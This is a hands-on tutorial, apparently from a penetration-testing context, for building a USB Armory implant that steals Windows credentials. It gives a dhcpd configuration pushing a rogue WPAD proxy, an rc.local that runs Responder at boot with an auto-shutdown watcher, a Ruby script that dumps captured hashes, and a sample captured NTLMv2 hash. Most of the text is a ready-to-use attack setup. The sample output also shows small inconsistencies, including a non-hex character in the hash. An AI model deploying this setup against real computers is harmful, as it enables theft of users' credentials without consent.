Installing the image
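# Fetch the release image; the original line repeated "wget -c" (-c resumes a partial download).
wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip
# Check the archive against the checksum/signature published with the release before writing it
# to a card (not shown here), then unpack it: the dd step below expects the extracted .raw file.
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip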
# List block devices to identify the microSD card; the dd step below overwrites whatever device it is given.
fdisk -l
Burn the image onto the microSD card
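# Device node of the microSD card as shown by fdisk -l. /dev/sdc is the author's value — set it to
# yours; dd asks for no confirmation and destroys the contents of whatever device it writes to.
sd_dev=/dev/sdc
# Refuse to run against a missing or mistyped target instead of creating a regular file there.
[ -b "$sd_dev" ] || { printf 'not a block device: %s\n' "$sd_dev" >&2; exit 1; }
dd if=usbarmory-debian_jessie-base_image-20170518.raw of="$sd_dev" bs=1M conv=fsync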
Setting up repositories
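# apt reads /etc/apt/sources.list (plural); the original opened "source.list", a file apt never reads.
nano /etc/apt/sources.list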
Remove all current repositories and add the following:
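###### Debian Main Repos
# The base image is jessie (see the image filename) and the backports line below is jessie-specific,
# so the suite is pinned to the codename rather than the moving alias "stable": once "stable" points
# at a newer release, "apt upgrade" would pull the whole system onto it while still mixing in
# jessie-backports.
deb http://deb.debian.org/debian/ jessie main contrib non-free
deb-src http://deb.debian.org/debian/ jessie main contrib non-free
deb http://deb.debian.org/debian/ jessie-updates main contrib non-free
deb-src http://deb.debian.org/debian/ jessie-updates main contrib non-free
deb http://deb.debian.org/debian-security jessie/updates main
deb-src http://deb.debian.org/debian-security jessie/updates main
deb http://ftp.debian.org/debian jessie-backports main
deb-src http://ftp.debian.org/debian jessie-backports main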
Now refresh the package lists and upgrade:
# Refresh the package lists from the new sources, then upgrade the installed packages.
apt update
apt upgrade
Enable internet access on the USB armory
On your Linux host machine:
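# Host-side NAT so the armory can reach the internet through this machine.
wan_if=wls1   # the host's internet-facing interface (author's value; substitute yours)
# Interface the armory shows up as on the host; not named on this page, so it must be supplied.
armory_if=${ARMORY_IF:?set ARMORY_IF to the host interface the armory appears on}
# Forwarding is off by default on the host; the FORWARD rules alone do nothing without it.
sysctl -w net.ipv4.ip_forward=1
# Forward only between the two interfaces involved. The original blanket
# "iptables -I FORWARD -j ACCEPT" made the host route traffic for any attached network.
iptables -I FORWARD -i "$armory_if" -o "$wan_if" -j ACCEPT
iptables -I FORWARD -i "$wan_if" -o "$armory_if" -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -t nat -I POSTROUTING -o "$wan_if" -j MASQUERADE
# None of these rules persist; they are gone after a reboot of the host.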
Here wls1 is the host's internet-facing interface; substitute your own.
Bash autocompletion
# Install the completion package, then open the system-wide bashrc to enable it.
apt install bash-completion
nano /etc/bash.bashrc
Search (Ctrl+W) for the line:
# enable bash completion in interactive shells
Then uncomment the following lines (they are commented out by default):
# Only load completion when bash is not running in POSIX mode; the two branches cover the
# bash-completion package's file and the older /etc location, in that order.
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
Apply the changes:
# Re-read the file in the current shell so completion is active without logging out.
source /etc/bash.bashrc
Installing basic applications
System applications and libraries
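# System packages and libraries. inotify-tools is added because the rc.local watcher below calls
# inotifywait, which nothing else on this page installs. The dhcpd binary that rc.local starts is
# not covered by this list either — confirm it is on the base image or install isc-dhcp-server
# (note its service would then start dhcpd on boot by itself).
apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev inotify-tools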
Ruby
# Ruby runtime and headers (ruby-dev is needed to build native gems such as sqlite3 further down).
apt-get install -y ruby ruby-dev
# pry is an interactive Ruby shell for debugging; the reader script below does not use it.
gem install pry
Python
# Python toolchain; on jessie the "python" package is Python 2, which the Responder.py checkout
# started by rc.local presumably expects — verify against the revision you clone.
apt-get install -y python python-pip python-dev
# pycrypto is unmaintained; pycryptodome is its maintained successor with the same import name —
# check Responder's own requirements before swapping.
pip install pycrypto
Attack Setup
Enable IP forwarding
- Enable kernel IP forwarding
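nano /etc/sysctl.conf
# Load the edited file now; otherwise the setting only takes effect after a reboot.
sysctl -p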
Uncomment the following line:
# Let the kernel forward packets between interfaces (commented out by default in /etc/sysctl.conf).
net.ipv4.ip_forward=1
- Enable firewall masquerading
# NAT traffic leaving the armory on usb0. Like the host rules above this is not persistent; the
# rc.local below does not re-create it, so add it there or save the ruleset if it must survive a reboot.
iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE
DHCPd setup (ISC dhcpd configuration, /etc/dhcp/dhcpd.conf on Debian)
#
# ISC dhcpd configuration for the armory, based on the Debian sample file.
#
# Do not attempt dynamic DNS updates when a lease is confirmed.
ddns-update-style none;
# Options handed to every client: search domain and DNS server. 10.0.0.1 is also the router
# address below, so presumably it is the armory's own address on usb0 — it must match what
# is configured on that interface.
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;
default-lease-time 600;
max-lease-time 7200;
# This is meant to be the only DHCP server on its link, so answer authoritatively
# (clients asking to renew leases from another network get a DHCPNAK).
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# Declare DHCP option 252 (WPAD proxy auto-configuration URL) as a text option.
option local-proxy-config code 252 = text;
# The single /24 served. Only two addresses are handed out, and the subnet-level lease times
# (60 s / 72 s) override the global defaults above, so clients re-contact the server frequently.
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.3;
default-lease-time 60;
max-lease-time 72;
option routers 10.0.0.1;
option local-proxy-config "http://10.0.0.1/wpad.dat";
}
Responder setup
Download Responder:
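mkdir -p /pentest
cd /pentest || exit 1
# Cloned over HTTPS from the upstream project; inspect or pin the checked-out revision before
# letting rc.local run it as root at every boot.
git clone https://github.com/spiderlabs/responder
# Responder.py is inside the clone; the original "chmod +x Responder.py" ran in /pentest and
# could not find it. rc.local below invokes "python Responder.py", so the bit is only a convenience.
chmod +x responder/Responder.py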
Make it start on boot (/etc/rc.local):
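#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# Boot-time setup for the armory: generate SSH host keys on first boot, start dhcpd on usb0,
# start Responder in a screen session, and start a watcher that halts the device as soon as
# Responder.db changes. Progress messages are appended to /root/rc.log.
# Needs: dhcpd (/usr/sbin/dhcpd), screen, python + Responder under /pentest/responder,
# and inotifywait from inotify-tools.
set -e

# Append one progress line to the boot log.
log() {
  echo "$1" >> /root/rc.log
}

# Succeeds if at least one SSH host key file exists (replaces the original "ls | wc -l" parse).
ssh_host_keys_present() {
  for key in /etc/ssh/ssh_host_*; do
    [ -e "$key" ] && return 0
  done
  return 1
}

# Generate ssh host keys if missing; wait for the entropy pool to fill first so the keys are
# not generated from a starved pool right after boot.
if ! ssh_host_keys_present; then
  while [ "$(cat /proc/sys/kernel/random/entropy_avail)" -lt 256 ]; do
    sleep 1
  done
  /usr/sbin/dpkg-reconfigure openssh-server
fi

# Start DHCP server, bound to usb0 only. Without an interface argument dhcpd answers on every
# interface, including any uplink the armory is attached to, and would hand out 10.0.0.x leases there.
if ! pgrep -x dhcpd > /dev/null; then
  log "Starting DHCPd"
  # Start from an empty lease database on every boot (the original wrote a single newline).
  : > /var/lib/dhcp/dhcpd.leases
  /usr/sbin/dhcpd usb0
fi

# Start Responder (options unchanged) in a detached screen so it outlives this script.
log "Starting Responder"
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'

# Halt the device the first time Responder.db is modified. inotifywait fails if the file
# does not exist yet when this starts, and the loop then ends silently — confirm Responder
# has already created the database on this image before relying on the watcher.
log "Starting cred watch"
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'
exit 0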
Post attack
To retrieve all captured credentials from Responder, open /pentest/responder/Responder.db directly,
or use the following script to parse it.
Install the sqlite3 gem:
# Native gem; it builds against libsqlite3-dev from the package list above.
gem install sqlite3
Run the following script (saved as responder-reader.rb):
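#!/usr/bin/env ruby
#
# Responder database reader
#
# Prints every row of the "responder" table in the SQLite database Responder writes
# (Responder.db), one labelled block per record.
#
# Usage: ruby responder-reader.rb /path/responder/Responder.db
# Exits with status 1 (and a message on stderr) on a usage error or a missing file;
# the original exited 0 and printed the usage text to stdout.
require "sqlite3"

unless ARGV.size == 1
  warn "Responder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
  exit 1
end
responder_db = ARGV[0]

unless File.file?(responder_db)
  warn "No such file: #{responder_db}"
  exit 1
end

# Open read-only: this tool only reports and must never alter the capture database.
db = SQLite3::Database.new(responder_db, readonly: true)
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of records: #{records.size}"
sleep 1
records.each do |record|
  # Column 5 holds the account as DOMAIN\user (for local accounts the workstation name stands
  # in for the domain, as in the sample output). to_s keeps a NULL column from raising;
  # a value without a backslash yields an empty Username.
  account = record[5].to_s.split('\\')
  puts "Timestamp: #{record[0]}"
  puts "Module: #{record[1]}"
  puts "HashType: #{record[2]}"
  puts "IPaddress: #{record[3]}"
  puts "Hostname: #{account[0]}"
  puts "Username: #{account[1]}"
  puts "Cleartext: #{record[6]}"
  puts "Hash: #{record[7]}"
  puts "Full Hash: #{record[8]}"
  puts
end
db.close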
# Run the reader against the database path used by rc.local above.
ruby responder-reader.rb /pentest/responder/Responder.db
Result:
[+] Number of recrods: 1
Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....